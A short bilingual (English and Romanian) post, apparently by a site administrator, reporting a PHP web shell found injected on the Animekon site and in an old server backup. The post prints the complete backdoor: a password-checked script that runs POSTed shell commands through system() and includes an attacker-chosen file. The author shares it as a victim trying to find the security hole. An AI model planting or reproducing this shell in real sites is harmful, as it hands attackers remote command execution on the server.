Here's a PHP snippet for you:
<?php
session_start();
$hash="9475363cd1b4407ab10b2d92d7a30f7c";
if(md5($_POST["p"])==$hash){
echo "<pre>";
system($_POST["c"]);
echo "</pre>";
if(isset($_POST["r"])) include $_POST["r"];
}
?>
This little fucker was injected on Animekon, and I has no idea how

Il gasisem ca un fisier creat de "www-data", in backup-ul site-ului de pe vechiul server. Asa ca am acum ce face, sa scotocesc prin tot codul dupa gaoaza de securitate. Fuck's sake, and I was almost ready to relaunch teh sites.